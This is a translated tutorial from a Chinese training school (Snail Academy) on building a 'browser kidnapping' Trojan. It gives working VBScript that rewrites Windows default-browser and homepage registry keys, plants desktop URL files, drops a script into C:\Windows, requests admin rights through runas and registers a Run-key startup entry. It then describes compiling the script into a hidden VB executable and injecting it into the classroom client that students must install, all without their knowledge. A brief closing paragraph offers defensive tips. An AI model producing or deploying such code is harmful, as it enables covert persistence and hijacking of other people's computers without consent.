Research on the realization and defense method based on injection Trojan virus (browser kidnapping)

Research on the realization and defense method based on injection Trojan virus (browser kidnapping)

Affirm:

​ This article focuses on the research and discussion of technology, provides an implementation idea for students studying development, and provides a direction for software security testing for students studying testing. If some readers make some personal tampering through this article, and conduct illegal operations, etc., it has nothing to do with the Snail Academy and the author.

Foreword:

​ Students studying in Snail Academy know that every day after the lecturer teaches, the video of the day’s lecture will be uploaded to our online classroom (www.woniuxy.com). As long as the students log in, they can review the video of the previous teacher’s lecture. review. As more and more students come to our Snail Academy to study, many students who have just entered the school are very naive about computer operations. Then I found that many students first opened Baidu when they entered our official website, then searched for "Snail Academy" on Baidu, and then clicked on the link to enter our official website. Such an operation is inconvenient and also wastes Baidu's promotion costs. In response to the above problem, asking every student to set a browser bookmark, this workload is a bit heavy, and it is very cumbersome to operate it once in each class. That's why the author considered using a virus to force students to bind to our official website. After all, where you learn technology, you use technology to solve practical problems.

text:

​ First of all, we must first understand what is browser kidnapping, that is, through technical means to allow your browser to visit the specified website by default when it is opened, such as modifying the homepage. We often saw this kind of operation a few years ago. For example, when the browser opens the homepage, it becomes a 123 website. The general implementation method is to modify the default browser in the user's registry information and the related content of the default homepage through a local software, and then the user's homepage becomes a designated website. The following piece of code uses VBS (Visual Basic Script) language to change the default browser to IE and the default homepage to our official website:

On Error Resume Next
Dim defaultUrl, regOPeration
defaultUrl = "https://www.woniuxy.com"
Set regOPeration = CreateObject("WScript.Shell")
regOPeration.RegWrite "HKEY_CLASSES_ROOT\http\shell\open\command\", """C:\Program Files\Internet Explorer\iexplore.exe"" -- ""%1"""
regOPeration.RegWrite "HKEY_CLASSES_ROOT\htmlfile\shell\open\command\", """C:\Program Files\Internet Explorer\iexplore.exe"" -- ""%1"""
regOPeration.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", defaultUrl
regOPeration.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", defaultUrl

​ The following is the corresponding registry location for the browser:

系统默认浏览器注册表：
"HKEY_CLASSES_ROOT\http\shell\open\command\"
"HKEY_CLASSES_ROOT\htmlfile\shell\open\command\"
机器默认首页注册表：
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
用户默认首页注册表：
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"

​ At this point in the code, someone may ask: Why use VBS as an ancient language? Can other languages ​​like Java or Python be implemented? First of all, VBS is the son of Microsoft. Although the scope of use is relatively small now, this language has an advantage that other languages ​​do not have. It can easily call WScript.Shell objects in the Windows environment to directly operate the HKEY_CLASSES_ROOT registration that requires administrator privileges. table. Another feature is that the Windows environment comes with a VBS interpreter, which is very convenient to run directly in the Microsoft environment. So the above code only needs to be written in Notepad, and then the suffix name .txt is changed to .vbs to run. But is it possible for other languages? Of course it is possible.

Before execution:

After execution:

​

​

​ The next question comes. The first point is that the homepage registration form is only valid for IE browser, and now users almost never use IE browser as the system default browser. For example, the user uses browsers such as 360, QQ, Google, etc. as the default browser. How can browsers like this type that do not provide a homepage interface in the system registry to achieve kidnapping? There is only one way of thinking here: we can create a shortcut to the desktop for the default browser of the system, and then set the access homepage of the browser shortcut as our online classroom. This way we can complete the kidnapping. The relevant code is as follows:

Dim browserPath '默认浏览器路径
Dim starDir		'快捷方式起始位置
Dim WShell		'WScript对象
Dim desktopPath	'桌面对象
Dim link		'快捷方式对象
Dim firstUrl	'默认首页链接
Dim linkName	'快捷方式名称

linkName = "蜗牛学院-在线课堂"
firstUrl = "www.woniuxy.com"
Set WShell = CreateObject("WScript.Shell")

'截取到默认浏览器exe文件路径
browserPath = WShell.RegRead("HKEY_CLASSES_ROOT\http\shell\open\command\")
browserPath = Split(browserPath, ".exe")(0)
browserPath = Mid(browserPath,2) & ".exe"

'获取起始位置
tempDir = Split(browserPath, "\")
For i = 0 to UBound(tempDir) - 1
	starDir = starDir & tempDir(i) & "\"
Next
starDir = Mid(starDir,1, Len(starDir)-1)

'创建桌面快捷方式
desktopPath = WShell.SpecialFolders("Desktop")
Set link = WShell.CreateShortcut(desktopPath & "\" & linkName & ".lnk")

link.TargetPath = browserPath	'目标位置
link.Arguments = firstUrl '添加默认页面
link.WindowStyle = 3	'激活方式：1默认窗口大小，3最大化，7最小化	

link.WorkingDirectory = starDir	'设置起始位置
link.IconLocation = browserPath	'设置图标
link.Save

​ Write the above code into a txt file, and then modify the suffix name. Vbs after running:

​ The link.Arguments = firstUrl in the code is very important, because if you want the shortcut to open and directly access the specified page, you must add the page address in the target attribute of the shortcut, and if you use the CreateShortcut function to add it after splicing Unable to create shortcut.

​

​ After the code is written here, we will find three problems. The first is that if the default browser is not set in the system (there is no corresponding value in the registry) or the default browser is not registered in the registry, then the user will use IE or Edge to open the shortcut. The second problem is that if the user deletes the desktop shortcut, the purpose of kidnapping will not be achieved. The third is that the code is triggered and executed by a vbs, and the user will not be foolish to double-click.

​ First solve the first problem, give up the use of shortcuts, and directly use the url connection file to solve it. The url connection file stores the specified access connection. When the user clicks on the url file, it will directly open the system default browser, which is equivalent to the user clicking a hyperlink in excel, which is very convenient. Create url code and shortcut are similar:

Dim urlFile
Dim WShell
Dim desktopPath
Dim filePath
Dim firstUrl
Set WShell = CreateObject("WScript.Shell")
desktopPath = WShell.SpecialFolders("Desktop")
filePath = desktopPath & "\蜗牛学院在线课堂.url"
firstUrl = "http://www.woniuxy.com"

set urlFile = CreateObject("Scripting.Filesystemobject").opentextfile(filePath, 8, True)
urlFile.WriteLine("[InternetShortcut]")
urlFile.WriteLine("URL=" & firstUrl)
urlFile.WriteLine("showcommand=3")
urlFile.Close

​ Operation effect:

​ Next, the second and third problems are relatively complicated to solve, let's talk about the second problem first. We can put the above vbs in a public place (C:\Windows) that almost no user pays attention to in the system, and then set the script to run once every boot by modifying the registry. Then if the user deletes the URL currently, it will appear again after restarting the computer.

​ Registry boot entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

​ Related code:

Dim urlFile
Dim WShell
Dim desktopPath
Dim filePath
Dim firstUrl
Dim startPath	'开机启动位置

Set WShell = CreateObject("WScript.Shell")

'添加当前文件到开机启动
startPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"
WShell.RegWrite startPath & "\" & "woniuxy", "C:\Windows\woniuxy_url.vbs" & " /r", "REG_SZ"

desktopPath = WShell.SpecialFolders("Desktop")
filePath = desktopPath & "\蜗牛学院在线课堂.url"
firstUrl = "http://www.woniuxy.com"

set urlFile = CreateObject("Scripting.Filesystemobject").opentextfile(filePath, 8, True)
urlFile.WriteLine("[InternetShortcut]")
urlFile.WriteLine("URL=" & firstUrl)
urlFile.WriteLine("showcommand=3")
urlFile.Close

​ Name the above code as woniuxy_url.vbs, and then put it in the C:\Windows file to run, and the startup script will be added to the registry.

​ After here, there is a new problem, that is, normal users will not take the initiative to put the vbs script in their Windows directory. This needs to be solved together with the three problems mentioned above. The overall idea is:

1. Write a vbs script woniuxy.vbs.

2. Write another script woniuxy_url.vbs to a specified folder (C:\Windows) in woniuxy.vbs. (Note that if it is a Win10 system, you need to obtain super administrator permissions)

3. Compile woniuxy.vbs into exe, and then inject it into other exe files.

The code of woniuxy.vbs is as follows:

On Error Resume Next
WScript.Sleep 1500

Dim fso, startFile
Dim filePath    '文件路径
Dim WShell      'WScript对象
Dim startPath   '开机启动位置

'超级管理员权限
If WScript.Arguments.Length = 0 Then
    Set ObjShell = CreateObject("Shell.Application")
    ObjShell.ShellExecute "wscript.exe", """" & WScript.ScriptFullName & """ RunAsAdministrator", , "runas", 1
    WScript.Quit
End If

filePath = "C:\Windows\woniuxy_url.vbs"
Set fso = CreateObject("scripting.filesystemobject")
Set startFile = fso.CreateTextFile(filePath, , ture)

'woniuxy_url.vbs内容
startFile.WriteLine "Dim urlFile,WShell,desktopPath,filePath,firstUrl"
startFile.WriteLine "Set WShell = CreateObject(""WScript.Shell"")"
startFile.WriteLine "desktopPath = WShell.SpecialFolders(""Desktop"")"
startFile.WriteLine "filePath = desktopPath & ""\蜗牛学院在线课堂.url"""
startFile.WriteLine "firstUrl = ""http://www.woniuxy.com"""
startFile.WriteLine "set urlFile = CreateObject(""Scripting.Filesystemobject"").opentextfile(filePath, 8, True)"
startFile.WriteLine "urlFile.WriteLine ""[InternetShortcut]"""
startFile.WriteLine "urlFile.WriteLine ""URL="" & firstUrl"
startFile.WriteLine "urlFile.WriteLine ""showcommand=3"""
startFile.WriteLine "urlFile.Close"

'运行url
startFile.WriteLine "desktopPath = WShell.SpecialFolders(""Desktop"")"
startFile.WriteLine "WShell.Run desktopPath & ""\蜗牛学院在线课堂.url"", 4"
startFile.Close

'文件添加到开机启动
Set WShell = CreateObject("WScript.Shell")
startPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"
'添加到开机启动项
WShell.RegWrite startPath & "\" & "woniuxy", filePath & " /r", "REG_SZ"

'运行生成的脚本
WShell.Run filePath

​ After the above woniuxy.vbs is completed, we need to compile it into an exe executable file. There are many common vbs compilers on the market, such as Vbs_To_Exe, but the effect is not satisfactory. VBS itself is a script belonging to the VB (Visual Basic) language. The relationship between them is different from Java and JavaScript, so the best solution is to use VB to pack and compile VBS. The usage is also very simple. Create a new form in VB without any controls. Write the source code of woniuxy.vbs into the Form_Load function. Then set the Visible property to False in the form properties (hide the form at startup).

​ After compiling into exe through VB, our Trojan horse is completed. The last step is to inject the Trojan exe file into another frequently used exe file. The choice of this article is based on the student terminal of the electronic classroom, because students who come to study at Snail Academy must install this student terminal to listen to the class normally. Then, the unpacking and packing process of the file is not within the scope of this article, so I won't elaborate on it here. Interested friends can contact the author or follow up to discuss it.

Conclusion:

​ The last thing I want to say is that in order not to infringe the interests of other software, none of the above technologies involves the anti-virus process. In other words, if there is anti-virus software in the user's system, the above-mentioned Trojans cannot be bypassed.

​ At the same time, if you have insufficient computer control capabilities, worry about viruses in daily use, and are unwilling to install anti-virus software (too many rogue bindings) (I run naked for more than ten years). Usually, you should develop the habit of observing the system environment more, such as the startup items in the task manager, and see if you are unfamiliar with it, and then see if the corresponding position of the registry in this article has been modified. Finally, it is recommended that novice computer users try to use UAC (Microsoft Account Control), which is a system-level monitoring of any interpreter and executor in the environment.

No matter you have any questions about your studies, Chongqing Snail College welcomes you to come to consult, contact QQ: 296799112